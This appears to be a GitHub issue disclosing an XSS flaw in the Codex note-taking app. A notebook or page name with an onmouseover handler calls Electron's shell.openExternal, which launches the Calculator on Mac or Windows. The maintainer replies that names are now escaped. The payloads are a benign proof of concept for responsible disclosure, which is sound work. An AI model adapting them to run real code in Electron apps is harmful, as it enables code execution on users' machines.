You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Cross-site scripting(XSS) on Codex Notebook/Page name lead to code execution.
Reproduction
Open Codex
Create new Notebook
Insert payload on the Notebook(or page) name field
On Mac <a href=x onmouseover="require('electron').shell.openExternal('file:///System/Applications/Calculator.app')">test</a>
On Windows <a href=x onmouseover="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')">test</a>
Once you move your mouse over the link "test" , Calculator will be opened.
Mitigation
Disable nodeIntegration
The text was updated successfully, but these errors were encountered:
Thank you very much for letting me know about this. I've made it so that it sanitizes/escapes the notebook's name/icon text and page's name.
About disabling nodeIntegration, I'm going to do a project rewrite soon that will make the main/renderer processes interact the way they're supposed to do securely, and that'll include disabling nodeIntegration. But I just wanted to get this fix out quickly and that rewrite is gonna take a while
Issue
Cross-site scripting(XSS) on Codex Notebook/Page name lead to code execution.
Reproduction
On Mac
<a href=x onmouseover="require('electron').shell.openExternal('file:///System/Applications/Calculator.app')">test</a>
On Windows
<a href=x onmouseover="require('electron').shell.openExternal('C:/Windows/System32/calc.exe')">test</a>
Mitigation
Disable nodeIntegration
The text was updated successfully, but these errors were encountered: